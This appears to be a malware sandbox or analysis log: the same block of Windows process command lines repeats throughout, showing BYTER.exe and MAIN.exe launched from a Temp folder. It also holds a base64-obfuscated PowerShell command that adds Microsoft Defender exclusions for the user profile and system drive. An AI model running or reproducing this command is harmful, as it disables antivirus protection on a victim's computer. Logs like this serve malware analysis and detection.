"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

